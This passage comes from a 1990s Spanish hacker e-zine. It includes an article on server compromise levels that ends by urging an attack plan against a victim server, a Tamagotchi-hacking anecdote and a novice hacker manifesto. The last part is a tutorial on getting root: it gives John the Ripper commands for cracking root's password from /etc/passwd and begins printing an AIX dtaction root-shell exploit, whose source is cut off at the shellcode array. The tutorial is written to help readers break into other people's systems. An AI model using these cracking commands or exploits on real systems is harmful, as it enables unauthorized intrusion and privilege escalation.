  7602.   server, logicamente existen mas :), pero esto nos simplificara mucho nuestro
  7603.   trabajo. Solo nos queda tener informacion suficiente sobre cada agujero
  7604.   existente del esquema de arriba.
  7605.  
  7606.         En estos momentos ya conocemos los puntos de entrada a un servidor,
  7607.   por lo que ahora os explicare los diferentes puntos de peligro que existen
  7608.   en un servidor y cuales son los que mas nos interesan.
  7609.  
  7610.         Para esto usaremos la Tabla de los Niveles de Cracking de Sam, la
  7611.   cual seguro os sera muy interesante, no solo para los propios hackers sino
  7612.   tambien para los Administradores (para que luego digan que no les ayudamos
  7613.   :), que es la siguiente:
  7614.  
  7615.     ------------------------------------------------------------------------
  7616.     │             Tabla de los Niveles de Cracking de Sam                  │
  7617.     ------------------------------------------------------------------------
  7618.  
  7619.                        ┌───────────────────────┐       Usuarios remotos
  7620.                        │           1╔════════════════> obtiene root 
  7621.     Ataques de         │ ┌──────────║────────┐ │       
  7622.     Mail bomb <════════╣ │         2║        │ │       
  7623.                        │ │ ┌────────║──────┐ │ │
  7624.     Ataques            │ │ │       3║      │ │ │
  7625.     mediante           │ │ │ ┌──────║────┐ │ │ │
  7626.     DoS      <══════════╣│ │ │     4║    │ │ │ │
  7627.                        │ │ │ │ ┌────║──┐ │ │ │ │       Usuarios remotos
  7628.                        │ │ │ │ │   5║  ╠═════════════> pueden escribir en
  7629.     Usuarios           │ │ │ │ │ ┌──╩┐ │ │ │ │ │       archivos del sistema
  7630.     locales            │ │ │ │ │ │ 6 │ │ │ │ │ │
  7631.     obtienen sin       │ │ │ │ │ └───┘ │ │ │ │ │
  7632.     autorizacion       │ │ │ │ │   5   │ │ │ │ │
  7633.     permiso de         │ │ │ │ └───────┘ │ │ │ │
  7634.     lectura <════════════╣ │ │     4     │ │ │ │
  7635.                        │ │ │ └──────────╦┘ │ │ │
  7636.                        │ │ │       3 ╦  ║  │ │ │
  7637.                        │ │ └╦────────║──║──┘ │ │
  7638.     Usuarios           │ │  ║      2 ║  ╚════════════> Usuarios remotos 
  7639.     locales            │ └──║────────║───────┘ │       pueden leer archivos
  7640.     pueden escribir    │    ║      1 ║         │       del sistema {PELIGRO}
  7641.     en ficheros que    └────║────────║─────────┘
  7642.     no deberian  <══════════╝        ╚═══════════════> Usuarios remotos
  7643.                                                        obtienen sin
  7644.                                                        autorizacion logins
  7645.                                                        del sistema
  7646.  
  7647.         Ahora como hackers o Administradores conocemos los distintos niveles
  7648.   de peligro en un servidor. Logicamente a cada uno le interesa un nivel
  7649.   diferente, por ejemplo a un hacker le interesa los niveles {3,4,5,6}, a un
  7650.   Administrador le interesan todos los niveles para poder evitarlos, a un
  7651.   cracker le interesan los niveles destructivos {1}.
  7652.  
  7653.         En las siguiente lineas explicare, los distintos niveles, para que
  7654.   queden bien claro.
  7655.  
  7656.         * Nivel 1: En este nivel los ataques son poco importantes, ya que
  7657.   no conseguiran acceso a la red pero por el contrario pueden bloquear o
  7658.   resetear el sistema. Basicamente estos ataques se basan en mailing bombing
  7659.   y Denial Of Service, el primero es muy facil de seguir el rastro mientras
  7660.   que el segundo puede ser mas complicado. Hay que decir que se utiliza el
  7661.   Denial Of Service como avanzadilla de otros atques. Este nivel es muy facil
  7662.   de proteger y controlar.
  7663.  
  7664.         * Nivel 2 y 3: En estos niveles el peligro es mayor, ya que los
  7665.   usuarios pueden escribir o leer en ficheros que no deberian pero ademas
  7666.   pueden intentar subir de nivel a partir de este, poniendo el sistema en
  7667.   mayor peligro. Los usuarios buscaran malas configuraciones o agujeros en
  7668.   algun software que le permita pasar a un nivel superior. Para la seguridad
  7669.   del sistema conviene que el Administrador este consciente de los avisos
  7670.   sobre seguridad en la comunidad informatica.
  7671.  
  7672.         * Nivel 4: En este nivel usuarios que no pertemecen al sistema han
  7673.   conseguido acceso, ademas de poder leer ficheros los cuales no deberian
  7674.   poder. Al igual que antes el acceso se debe a una mala configuracion del
  7675.   sistema, CGI o desbordamientos de memoria.
  7676.  
  7677.         * Nivel 5 y 6: Logicamente estos niveles son los mas peligrosos y
  7678.   nunca deberian ocurrir ya que el sistema dejaria de ser del Administrador.
  7679.   Esto se puede evitar facilmente si hemos reparado los niveles anteriores.
  7680.  
  7681.         Ahora llegados a este punto, ya tenemos una vision bastante amplia
  7682.   del analisis de un server remotamente, logicamente. Por lo que ya podemos
  7683.   con toda la informacion recopilada diseñar un plan de ataque y conseguir
  7684.   entrar en el server victima. Tambien hay que decir que aqui lo estamos
  7685.   simplificando pero en realidad no es tan facil, ya que existen muchas
  7686.   medidas de seguridad y seguramente nos toparemos con muchas, con lo que
  7687.   el circulo se ira estrechando.
  7688.  
  7689.         Pues aqui acaba este entrega y espero que os haya servido de algo,
  7690.   puede ser que parezca un rollo lo aqui explicado, pero esto es lo necesario
  7691.   para saber moverse y saber que hacemos todo el rato, ademas con la
  7692.   informacion aqui descrita podemos ayudar a los Administradores para que
  7693.   hagan su trabajo correctamente, cosa que muy pocos hacen, pero para eso
  7694.   estamos nosotros aqui ;-)
  7695.  
  7696.   Byes all y hasta la vista !!
  7697.     
  7698.                                                         CONDE VAMPIRO
  7699.                                                   - J.J.F. / HACKERS TEAM -
  7700.  
  7701. <────────────────────────────────────────────────────────────────────────────>
  7702. ██████████████████████████████████████████████████████████████████████████████
  7703. <────────────────────────────────────────────────────────────────────────────>
  7704.  
  7705.                       -------------------------------------
  7706.                       <><> Como Hackear un Tamatgotchi <><>
  7707.                       -------------------------------------
  7708.  
  7709.         Este es un articulo muy cachondo que me he encontrado en la 2600, en
  7710.   el numero de invierno, el articulo ha sido escrito originalmente por
  7711.   MiLtRoNi, y dice asi:
  7712.  
  7713.         "Cuando le compre a mi hija su primer tamatgotchi, pense que era algo
  7714.   que era bueno. Pero despues de unos dias, cuando me encontre solo en casa
  7715.   con el, fue cuando empezo a mauyar (es un gato) pidiendome "comida virtual".
  7716.   Al principio pase de el, pero luego se puso a llorar pidiendome ayuda. Que
  7717.   clase de padre era, si este era el juguete de mi hija y su creacion?.
  7718.   Primero, mi hija, tubo todos los cuidados de su "mascota virtual", le daba
  7719.   de comer, jugaba con el, le lababa, y luego a la cama. Todo fue bien por un
  7720.   momento hasta que "Liz" la gatita virtual paso al "otro lado", y asi le
  7721.   siguieron "Liz2" y "Liz3" y "Liz4". Mi hija al final se canso de tanta
  7722.   mascota virtual. Estaba horrorizado al ver como "Liz4" moria mientras pedia
  7723.   ayuda. La mascota pronto encontro su sitio en el fondo del cajon y de como
  7724.   gastar sus ultimas pilas, en una especie de "limbo virtual". Despues de unos
  7725.   dias que encontre un poco de tiempo, empece a experimentar con "LizX".
  7726.  
  7727.         Primero tube que llamarla de muchas maneras a medida que se me iban
  7728.   muriendo, algunos solo duraron unos minutos, otros algun que otro dia. Les
  7729.   iba a enseñar "trucos sucios", y SI, les castigaria si los hacian mal.
  7730.   Engordaban mu facil, constantemente mas bien, porque, por ejemplo cuando
  7731.   habeis visto a un gato que pesara 5 kilos cuando solo tenia 2 horas de vida
  7732.   :)?. Por eso tambien morian extremadamente facil. Incluso les seguia la
  7733.   paranolla de llevarlos al veterinario, pero lo unico que querian hacer era
  7734.   jugar y jugar.
  7735.  
  7736.         Era un dia frio de noviembre cuando nacio "Borg5". Sabia que este iba
  7737.   a ser diferente, era mi ultima creacion, y la definitiba :). Estaba
  7738.   perdiendo la cabeza con tanto gatito ya, asi que tenia que parar de una vez
  7739.   esta locura. "Borg5" era muy cooperativo, aparte de eso encontre que si
  7740.   reseteas su reloj interno interno a 11:59 pm, hace que gane un año en
  7741.   minutos, asi que en poco tiempo, ya tenia 5 años :), despues de esto
  7742.   descubri que si le quitabas algun que otro minuto podrias alargarle la vida.
  7743.   "Borg5" murio con 35 años y 45 kilos. No iba a pesar mas, ademas que su
  7744.   medidor de salud empezo a bajar a toda velocidad, "Borg5" murio durmiendo.
  7745.  
  7746.         Una vez que mi hija se dio cuenta, rapidamente aprendio a manipular el
  7747.   reloj, es cuando empezoa probar con el "pequeño frankenstein". Darle de
  7748.   comer, suponia una bonificacion de 20 puntos, la disciplina tambien. De
  7749.   todas formas, alimentarlo solo sirve para que gane peso y este contento.
  7750.   Nunca "tienes" que jugar con el si esta contento, es decir que si su nivel
  7751.   de felicidad esta en cero se puede hacer que viva igual :), incluso tubimos
  7752.   uno que no lo alimentamos ningun dia (con disgusto de mi hija) y vivia igual
  7753.   de feliz :).
  7754.  
  7755.         Todos los niños del vecindario querian aprender como se hacia para
  7756.   manipular el reloj de la mascota para practicar en las suyas (perros,
  7757.   tortugas...), era muy facil decirselo y ademas la sonrisa que ponian cuando
  7758.   lo practicaban, les pude haber cobrado 5 duros a cada uno por decirselo.
  7759.  
  7760.         Ahora, lo que hay, mas que mascotas virtuales, son "mutantes
  7761.   virtuales", me siento como si hubiera liberado a cierto tipo de monstruo,
  7762.   porque que pasaria si estos niños empiezan a probar en animales de verdad?
  7763.   he abierto la puerta a algun tipo de veterinario o Dr. Jeckill?. 
  7764.  
  7765.         Que opinaria Mattell Corp. si se enteraran que he alterado su
  7766.   industria de Billones de dolares?, estan los "Men in Black" al otro lado de
  7767.   al puerta?. Realmente pienso que a los niños de hoy hay que cambiarles su
  7768.   forma de pensar, nada de eso de "enseñame el triangulo azul" y esas cosas,
  7769.   de todas maneras, algun dia estos niños empezaran a usar ordenadores y a
  7770.   saber que haran..."
  7771.  
  7772.         Este articulo ha sido adaptado un poco al castellano para que se
  7773.   entienda mejor, espero que os haya gustado, jejejejeje, asi que nada mas y
  7774.   hasta otra :)
  7775.  
  7776.         Saludos a los grupos - J.J.F. / Hackers Team -, wakanda, ciberhack y a
  7777.   los canales de #hackers, #rejoin y especialmente a nobody, Fragel,
  7778.   Metalslug, Folixia, Meroka, ICEHOUSE y a todos aquellos de los que me
  7779.   olvido pero estan ahi :)
  7780.  
  7781.   Er Bisho (mama, mama, mama, mama, hay un bisho en mi cama)
  7782.  
  7783.   rolling_weables@hotmail.com
  7784.  
  7785. <────────────────────────────────────────────────────────────────────────────>
  7786. ██████████████████████████████████████████████████████████████████████████████
  7787. <────────────────────────────────────────────────────────────────────────────>
  7788.  
  7789.                        #################################
  7790.                        #       Manifiesto de un        #
  7791.                        #         hacker novato         #
  7792.                        #################################
  7793.                        #       by Silicon Dragon       #
  7794.                        #################################
  7795.                        #        Internet libre         #
  7796.                        #################################
  7797.  
  7798. ------------------------------------------------------------------------------
  7799.  
  7800.         En la vida de todo hacker siempre existe un periodo, a veces largo,
  7801.   en el cual uno es un autentico novatillo para las cosas de internet. K
  7802.   nadie diga k no ha pasado un tiempo mas o menos largo en el cual el/ella a
  7803.   sido asi.
  7804.  
  7805.         Entrar en el mundo del Underground suele resultar dificil, no conoces
  7806.   a nadie y no sabes donde buscar informacion que te permita ampliar tus
  7807.   conocimientos sobre tecnicas y en fin todas esas cosilla que hacen de
  7808.   internet un mundo interesante y divertido. Los pasos que la mayoria de los
  7809.   actuales hackers (al menos los k yo conozco) suelen ser similares, a pesar
  7810.   de que entre ellos no se pareccan escepto por el hecho de gustarles nuestro
  7811.   mundo, y digo nuestro mundo porque internet es el mundo del hacker, donde
  7812.   nos relacionamos, pasamos buenos ratos, adquirimos conocimientos y hacemos
  7813.   nuevas amistades que nos permiten seguir adelante en el mundillo. Por otro
  7814.   lado vosotros/nosotros/ellos, los hackers, con mas o menos conocimientos,
  7815.   somos un grupo que vivimos aqui, en internet, y estamos acostumbrados a
  7816.   movernos por este mundo, aqui somos los reyes en la sombra, los maestros
  7817.   del bit, los luchadores por la libertad que luchan por sobrevivir ante un
  7818.   concepto mal creado de que somos "criminales sin escrupulos"; FALSO!!!,
  7819.   tenemos nuestra etica. Grandes compañias y grupos de intereses nos atacan e
  7820.   intentan aniquilarnos utilizando para ello arcaicas leyes y concepciones
  7821.   sobre el bien y el mal, pero ellos no se dan cuenta que nosotros, la tribu
  7822.   del ciberespacio, tenemos el poder en nuestras manos; o mas correctamente
  7823.   en nuestras mentes, libres y claras, nuestros dedos tecleando secuencias
  7824.   nunca soñadas por ellos, los guardianes de la moral publica y el estado de
  7825.   derecho; y nuestros ordenadores, maquinas con las que entramos en este
  7826.   fascinate mundo de internet, mundo de electrones corriendo por chips de
  7827.   silicio y aluminio, mundo de libertad y conocimiento. INTERNET.
  7828.  
  7829.         Todo aquel que llega o intenta llegar a ser un hacker, !A vivir en
  7830.   el maravilloso mundo de internet! Sabe que no tiene que seguir unas normas,
  7831.   pero comparte con el resto de la tribu un codigo por el que se rige y que
  7832.   lo diferencia de los lamers, que sin tener ni idea de nada se las dan de
  7833.   sabios perjudicandonos al resto y dando razones a ciertos sectores para
  7834.   criticarnos, ponernos como ejemplos de mal, lanzando sobre los menos
  7835.   protegidos sus perros de presa en forma de actuaciones judiciales, redadas
  7836.   y como no llevandonos a juicio por socavar la economia de tal o cual
  7837.   compañia a la que "nosotros" hemos perjudicado. !!!!Nosotros!!!! que
  7838.   nuestro afan no es enrriquezernos como ellos hacen. !Tienen miedo! de que
  7839.   les quitemos su maravilloso dinero, sus estructuras organizadas, su mundo
  7840.   gris y falto de libertad. !!!!Nosotros!!!! que nos guian un afan de
  7841.   superacion, de busqueda de conocimientos, !No para enrriquezernos! como
  7842.   hace nuestra sociedad decrepita sino para aumnetar nuestros conocimientos
  7843.   nuestra mente sin fronteras nuestra libertad. ¡¡¡¡Nosotros!!!! que buscamos
  7844.   la libertad, que defendemos causas justas, que no molestamos, dañamos,
  7845.   matamos..... ¡¡¡¡Nosotros!!!! esa tribu de malditos que nos temen por
  7846.   nuestro poder, por las ideas que afirmamos, por nuestra libertad. Nosotros
  7847.   los hackers.
  7848.  
  7849.         Pero volvamos al tema que nos ocupa en este articulo. Me acuerdo de
  7850.   cierto amigo de electrones, ¿No adivinariais quien es?, al cual lo podemos
  7851.   llamar el dragoncito, je je je ya os lo imaginais quien ;) . Bueno pues ese
  7852.   amigo ,el dragoncito, era un chico, lo siento pero eso es innegable :)))) ,
  7853.   que a muy tierna edad y por los azares de la vida termino un verano delante
  7854.   de un ordenador, un 8086 o 80186, corria el año 85 (¿¿¿hace tiempo eh???)
  7855.   y sin nada por hacer, con mucho tiempo libre y algo de curiosidad, bueno
  7856.   lo admito mucha :))). Bueno, ese chico aprendio lo que podria llamarse los
  7857.   fundamentos de la informatica y la programacion (el BASIC ¿Vamos o creeis
  7858.   que empezo con ensamblador y binario?) el tiempo paso, mas o menos rapido, y
  7859.   hacia el año 1995-96 empezo lo que la mayoria de la gente llamaria inicio
  7860.   de una "carrera delictiva" o "fue por el mal camino" o "las malas compañias"
  7861.   o "le comieron la cabeza"...... vamos tonterias. Yo diria que inicio su
  7862.   vida en el fascinante mundo de internet donde todo es posible y se haya al
  7863.   alcance de nuestros programillas y nuestras mentes inquietas je je o
  7864.   vosotros que leeis esto no creeis en esta verdad.
  7865.  
  7866.         El hecho de tener una conexion a INTERNET es una ventaja que
  7867.   obviamente todos los que esteis leyendo esto teneis, a los demas les cobro
  7868.   derechos de autor :)))). Fue en ese momento, cuando el pequeño dragon
  7869.   optuvo la conexión, cuando pudo continuar sus andanzas por el mundo de los
  7870.   ordenadores, los cuales havia abandonado, porque mira que los libros de
  7871.   informatica suelen ser aburridos de cojones uffffff, y ya que habia oido
  7872.   algo hacerca de esos "peligrosos criminales" llamados hackers :))))))), ¿A
  7873.   que no sabeis que descubrio? "ostia si no son ni criminales, ni terroristas,
  7874.   ni locos, ni ladrones, son gente normal como yo!!!!" en fin la mascara con
  7875.   la que la sociedad nos cubre afecta a todos... Pues bien, el amigo
  7876.   dragoncito, como asi se llamaba ;) creo XDD, empezo a descubrir paginas en
  7877.   internet que le daban cierta informacion, truquillos, solo a nivel
  7878.   educativo :)) en fin lo que le encaminaria hacia las tinieblas( o en mi
  7879.   opinion hacia la luz, en INTERNET, es decir al dominio de la web, traspaso
  7880.   de ficheros, telnet, port spoofing, bugs de seguridad, passwords, root...)
  7881.   que le permitirian de una manera no dañina y recalco esto no dañina
  7882.   aprovechar todos los recursos que encontro en este mundo de electrones que
  7883.   corre a traves de lineas telefonicas, hondas herzianas y cables de fibra
  7884.   de vidrio a velocidades increibles, aumentando sus conocimientos hasta
  7885.   poder al fin, empezar a conocer este nuestro mundo donde todos somos
  7886.   maestros y alumnos, nadie sabe todo y de todos y en el que cualquiera
  7887.   (incluso los lamers) puede enseñar algo (en el caso de los lamers lo que
  7888.   no debes hacer XDDDD)
  7889.  
  7890.         Una de las primeras cosas que el y todo aspirante a hacker suelen
  7891.   hacer es leer todo lo posible sobre este tema a lo largo de la red, como el
  7892.   hizo, es en el unico sitio donde se encontraria la verdad sobre tecnicas,
  7893.   estilos y codigos sobre nuestro/vuestro entretenimiento/trabajo/vida como
  7894.   hackers, como ser que se desplaza a traves de corrientes de datos sin que
  7895.   nadie pueda ni detectarlo ni pararlo, ni atacarle ni dominarlo. Lo mas
  7896.   dificil (pero al alcance de todos) fue encontrar la primera pagina web
  7897.   sobre este tema, ya que no suelen estar en la guia telefonica para que
  7898.   cualquiera llame y pregunte como ser un hacker (los lamers intentan algo
  7899.   asi XDDD) de ahi en adelante, pudo llegar a encontrar links (enlaces
  7900.   burros!!!) a otras paginas y asi entrar en  el entramado de los
  7901.   conocimientos que se guardan en INTERNET, el mundo de electrones
  7902.   representados por conjuntos de bits el cual con nuestra "magia" dominamos
  7903.   y con esta energia creamos un argamedon de poder y un nuevo mundo a nuestro
  7904.   antojo (que filosofico me pongo a veces :)))). 
  7905.  
  7906.         Otra de las cosas que le facilitaron el integrarse en la "tribu"
  7907.   fueron unos conocimientos minimos sobre programacion, :(( si se que los
  7908.   libros de programacion suelen ser aburridos, lentos y estupidos, pero hay
  7909.   k joderse y aprender algo ya que es fundamental para ser un hacker, si no
  7910.   conformate con ser un cracker (lo cual no es necesariamente malo), bajate
  7911.   alguno de sus ficheros y rompe todo por donde pases como hizo Atila con los
  7912.   Romanos (el rey de los Hunos, tribu aliada de Cartago peazo bestia no es un
  7913.   hacker famoso :))) pero piensa que: 1- Va en contra de nuestra etica, 2-
  7914.   Realmente cualquiera puede hacer eso, es realmente facil bajarse ficheros
  7915.   de internet; 3- Eso no es propio de un hacker sino de un cracker (no son
  7916.   peores pero tienen una concepcion diferente ).
  7917.  
  7918.         Y finalmente otra de las cosas que le ayudaron fueron conocer a unos
  7919.   amigos (hackers no iban a ser cocineros, con todo mis respetos a estos
  7920.   ultimos :))))) que le explicaron algunas cosillas y le enseñaron donde
  7921.   localizar otras, la verdad es que el dragoncito es el amigo que todos
  7922.   quieren, le gustaba y le gusta aprender y suele ser simpatico (Lo siento
  7923.   pero su abuela no esta aqui para echarle flores  :))). Por otro lado, el
  7924.   IRC fue y es un buen sitio donde pedir ayuda, no siempre (o casi nunca lo
  7925.   reconozco) le contestaron (en cuanto le conocieron si, es que hay mucho
  7926.   IRC-COP ) pero de vez en cuando si. De paso saludos para los del canal
  7927.   #hackers del IRC-hispano (donde normalmente se habla de todo menos de la
  7928.   tematica del hacker, aunque te lo pasas bien je je je y a veces te ayudan,
  7929.   lo digo por esperiencia son buena gente, lo malo es cuando se aburren y les
  7930.   da por nukear a alguien ;) ). Pero bueno sigamos con la jodia historia.....
  7931.  
  7932.         El hecho de aprender y buscar ayuda, es si no el unico, si el mejor
  7933.   camino para adentrarse en este mundo. La ayuda siempre viene bien porque me
  7934.   acuerdo de lo que le paso en su primer telnet, llamando a un numero
  7935.   aleatorio que se le ocurrio termino dando con un ordenata que cada vez que
  7936.   le preguntaba algo le daba su direccion de ip (la del dragocillo) o otra
  7937.   vez que mando un e-mail falso a un amigo y resulta que el servidor al que
  7938.   se habia conectado escribio el nombre "supuesto" el remitente a
  7939.   continuacion del real (a tomar por culo el anonimato) todo ello le paso por
  7940.   no consultar a los que si que sabian eso lo nuestro es una busqueda de
  7941.   informacion y que mejor forma de distribuirla que compartirla entre
  7942.   nosotros que somos los mas interesados en que la informacion y la libertad
  7943.   se mantenga en INTERNET.
  7944.  
  7945.         La libertad de los hackers es fundamental para el mantenimiento de la
  7946.   libertad en INTERNET. No solo entre la cultura underground sino de todos
  7947.   los usuarios que utilizan este medio. Esta es la razon por lo que el
  7948.   pequeño dragoncito se metio en este mundillo, por la que los hackers siguen
  7949.   luchando a pesar de que constantemente se les fustiga desde todos los
  7950.   angulos de la sociedad. El nuestro es un trabajo vital y a mi/nosotros
  7951.   me/nos gusta nuestra libertad que no cambiaria por nada. En el camino para
  7952.   convertirse en hackers muchos pierden el rumbo, quizas es un camino dificil,
  7953.   pero merece la pena. No ir por falsos atajos se llega antes al final. Como
  7954.   dijo un famoso poeta Español "Caminante no hay camino, el camino se hace al
  7955.   andar". (Soy un chico culto ;) ). No somos hackers por tener los
  7956.   conocimientos lo somos al investigar; al buscar nuevos conocimientos,
  7957.   cuando ayudamos al nuevo a conocer el mundo, a buscar conocimientos, a
  7958.   escapar del mal, a respetar el codigo; al ampliar la libertad en INTERNET
  7959.   al luchar por ella contra los que intentan socavarla; al caminar; AL
  7960.   HACKEAR. Hemos nacido para ello somos los paladines de una causa justa,
  7961.   nadie debe cuartar nuestras libertades somos los dragones del amanecer de
  7962.   una nueva epoca, nos pueden llamar malvados pero el tiempo demostrara que
  7963.   hemos sido los cruzados de la causa de la libertad en INTERNET, vigilaremos
  7964.   a los poderes y no les dejaremos actuar contra nuestra libertad contra
  7965.   nosotros, al fin y al cabo, sabemos quienes somos y que queremos,la buskeda
  7966.   del conocimiento no sera parada asi que amigos, veteranos y novatos no os
  7967.   rindais a pesar de los surquemos los espacios virtuales, navegemos por
  7968.   los mares del conocimiento utilizemos nuestras garras de electrones
  7969.   nuestros cerebros de aluminio y silicio, y hagamos aquello que nos da la
  7970.   libertad y para lo que hemos nacido: SOMOS HACKERS Y AQUI ESTAMOS.... y que
  7971.   lo sepan nuestros enemigos saldremos victoriosos de las batallas, el futuro
  7972.   los odiara y nos aclamara por nuestra libertad entre bites y silicio.
  7973.  
  7974. ------------------------------------------------------------------------------
  7975.  
  7976.         Devo dar las gracias a mucha gente que me ha ayudado a entrar en este
  7977.   fascinante mundo, ups, digo ayudaron al dragoncito a entrar ;), algunos de
  7978.   una forma activa como Bisho al cual le, otro ups el dragoncito, le debe
  7979.   mucho. Otros escribiendo articulos o manteniendo paginas donde localizar
  7980.   los conocimientos oscuros (je je je me he rayao) como: J.J.F./ Hackers Team,
  7981.   Wakanda, Van Hackez, Sakeadores........ y muchos otros que si los pusiera
  7982.   en este articulo ocuparian Mb enteros y para los que brindo mi mayor apollo
  7983.   ya que sin ellos nuestro mundo no seia el mismo INTERNET no seria el mundo
  7984.   de libertad que es y nosotros, la trivu, no  tendriamos  donde habitar
  7985.   oscurecidos por los poderes malignos (ahora si que me he rayao) que
  7986.   intentan doblegarnos AUNQUE NUNKA LO LOGRARAN porque soy un hacker
  7987.   (novato eso si) y mi trivu me protegera y me ayudara a defenderme,
  7988.   tenemos el poder y sabemos como usarlo para conservar nuestra/vuestra
  7989.   libertad, SOMOS HACKERS, SOMOS LIBRES. 
  7990.  
  7991. ------------------------------------------------------------------------------
  7992.  
  7993.                                                   by Silicon Dragon
  7994.                                           e-mail dragonsilicio@bigfoot.com
  7995.  
  7996. ------------------------------------------------------------------------------
  7997.  
  7998.         La distrivucion de este texto es completamente libre salvo que sea
  7999.   usado por fuerzas de seguridad (en cuyo caso deberan de pagar por su uso
  8000.   una cantidad no inferior a $1,000,000.00) o para su uso en cualquier tipo
  8001.   de juicios y ese tipo de cosas (si no lo tienes claro preguntame XDDD) en
  8002.   cuyo caso los derechos del autor (yo) son los mismos que en el caso de la
  8003.   policia (a pagar chatos). Para los demas con meros fines educativos y tal
  8004.   es gratis :))).
  8005.  
  8006. <────────────────────────────────────────────────────────────────────────────>
  8007. ██████████████████████████████████████████████████████████████████████████████
  8008. <────────────────────────────────────────────────────────────────────────────>
  8009.  
  8010.                       ┌──────────────────────────────┐
  8011.                       █ INTRODUCCION AL HACKING v2.0 █
  8012.                       └──────────────────────────────┘
  8013.  
  8014.   POR DAEMON 25-01-1998
  8015.   Daemond@usa.net
  8016.   Dillet@usa.net
  8017.  
  8018.   7.- CONSEGUIR ACCESO DE ROOT
  8019.  
  8020.         En esta seccion voy a explicar tres metodos para conseguir root
  8021.   aunque hay algunos mas que quiza adjunte en posteriores ediciones. Los que
  8022.   voy a explicar aqui son la fuerza bruta, los xploits para pillar root y
  8023.   troyanos.
  8024.  
  8025.   7.1.- FUERZA BRUTA
  8026.  
  8027.         En fin, se puede intentar sacar el password del root a partir del
  8028.   fichero /etc/passwd pero sinceramente es muy dificil ke el root sea tan
  8029.   tordo de tener un password sencillo aunque funciona aproximadamente un 5%
  8030.   de los casos que algo es algo (mi experiencia es ke kada 10-15 makinas sako
  8031.   un password de root kon fuerza bruta usando solo los diccionarios usuales).
  8032.  
  8033.         Si no tienes mas recursos para pillar el root, puedes probar a sacar
  8034.   el passwd de root usando el modo incremental en cualquier crackeador. En el
  8035.   caso del john the ripper, la sintaxis seria john -i -rules -users:0
  8036.   ficheropasswd.
  8037.  
  8038.         He de avisar que el metodo incrementar es una locura, de hecho hay
  8039.   textos por ahi diciendo que tardaria años en sacar el passwd. Yo solo he
  8040.   probado una vez este metodo para ver que tal iba y me saco el passwd tras
  8041.   unas 70 horas, pero tras hablar con gente por ahi.. creo que tuve suerte.,
  8042.   es decir que de aqui se deduce que no vale la pena.. porque tener la
  8043.   maquina en marcha alomejor 100 horas o las que sean es una chorrada cuando
  8044.   se puede rular algun xploit y pillar el root en 5 minutos :-)
  8045.  
  8046.         De todos modos, una manera de trabajar seria no dedicar especial
  8047.   atencion al modo incremental, pero tras sacar algunas cuentas de usuarios
  8048.   normales, pasar algunos diccionarios con la opcion:
  8049.  
  8050.   John -wordfile:dict.txt -rules -users:0 passwd
  8051.  
  8052.         Y si rula, rula que tampoco se pierde tanto tiempo en pasar un par de 
  8053.   diccionarios :o)
  8054.  
  8055.         Pero en fin, en general el metodo mas rapido es usar un xploit como
  8056.   se comentara a continuacion aunque puede haber casos en los que el sistema 
  8057.   operativo en el que estais no encontreis xploits (sistemas operativos raros)
  8058.   o que estos xploits no funcionen por lo que estando muy desesperados podeis 
  8059.   hacerlo asi aunque en el caso de que los xploits no funcionen es ke 
  8060.   posiblemente el root kontrole y no creo que tenga un passwd sencillo, pero
  8061.   en fin.. nunka se sabe :)
  8062.  
  8063.   7.2.- XPLOITS
  8064.  
  8065.         En esta seccion voy a intentar poner uno de cada sistema operativo de
  8066.   los que suele haber por ahi y ademas voy a intentar que sean nuevecillos ..
  8067.   pero como siempre se pueden buscar en la red (siempre tengo el correo
  8068.   abierto para mails diciendome ftp buenos jeje).
  8069.  
  8070.         Para entender el funcionamiento de la mayoria de ellos, los famosos
  8071.   buffer overflow, puedes leer algunos articulillos que hay en la red de
  8072.   Aleph One o Mudge por poner algunos ejemplos.. opino que valen la pena ;o)
  8073.  
  8074.         Bueno.. aqui va el rollo de xploits (pongo uno de cada pero aconsejo
  8075.   que tengais por lo menos 10 de cada sistema operativo porque luego puede
  8076.   pasar que no tengas uno de una version determinada, que no rule, etc. Ademas 
  8077.   aconsejo que los ordeneis por sistemas operativos en directorios separados y 
  8078.   si eres muy currante los puedes ordenar hasta por versiones del sistema 
  8079.   operativo, pero eso ya es solo para gente ordenada jeje):
  8080.  
  8081.         No los pongo traducidos ya que creo que es una currada que no sirve
  8082.   para nada porque son de facil lectura. Ahi van:
  8083.  
  8084.   AIX
  8085.  
  8086. ------------ Codigo Fuente ---------------------------------------------------
  8087.  
  8088. /* Under AIX 4.2 (probably others) /usr/dt/bin/dtaction does not handle
  8089. properly the HOME environment variable and that spawns a root shell. A lot
  8090. of other X programs have the same problem and /bin/X11/xlock is well known
  8091. to be exploitable.
  8092. Tested on AIX 4.2 box.
  8093.  
  8094. SOLUTION: #chmod -s /usr/dt/bin/dtaction /bin/X11/xlock
  8095.  OR apply patches */
  8096.  
  8097. /*
  8098.  AIX 4.2,(others?) dtaction and HOME exploit by Georgi Guninski
  8099.  
  8100. ----------------------------------------
  8101. DISCLAIMER
  8102. This program is for educational purpose ONLY. Do not use it without
  8103. permission.
  8104.  The usual standard disclaimer applies, especially the fact that Georgi
  8105. Guninski
  8106.  is not liable for any damages caused by direct or  indirect use of
  8107.  the information or functionality provided by this program.
  8108.  Georgi Guninski, his employer or any Internet provider bears NO
  8109. responsibility for content
  8110.  or misuse of this program or any derivatives thereof.
  8111.  By using this program you accept the fact that any damage (dataloss,
  8112. system
  8113.  crash, system compromise, etc.) caused by the use of this program is not
  8114.  Georgi Guninski's responsibility.
  8115.  
  8116. In case you distribute this, please keep the disclaimer and my addresses.
  8117. -----------------------------------------
  8118. Use the IBM C compiler.
  8119. Compile with: cc -g aixdtaction.c
  8120. DISPLAY should be set.
  8121. SOLUTION: #chmod -s /usr/dt/bin/dtaction         ; at least stops root shells
  8122. -----------------
  8123. Georgi Guninski
  8124.  guninski@hotmail.com
  8125.  http://www.geocities.com/ResearchTriangle/1711
  8126.  
  8127. Suggestions,comments and job offers are welcome!
  8128. 10-JUNE-97
  8129. */
  8130. #include <stdio.h>
  8131. #include <stdlib.h>
  8132. #include <string.h>
  8133.  
  8134.  
  8135. char *prog="/usr/dt/bin/dtaction";
  8136. char *prog2="dtaction";
  8137. extern int execv();
  8138.  
  8139. char *createvar(char *name,char *value)
  8140. {
  8141. char *c;
  8142. int l;
  8143. l=strlen(name)+strlen(value)+4;
  8144. if (! (c=malloc(l))) {perror("error allocating");exit(2);};
  8145. strcpy(c,name);
  8146. strcat(c,"=");
  8147. strcat(c,value);
  8148. return c;
  8149. }
  8150.  
  8151. /*The program*/
  8152. main(int argc,char **argv,char **env)
  8153. {
  8154. /*The code*/
  8155. unsigned int code[]={
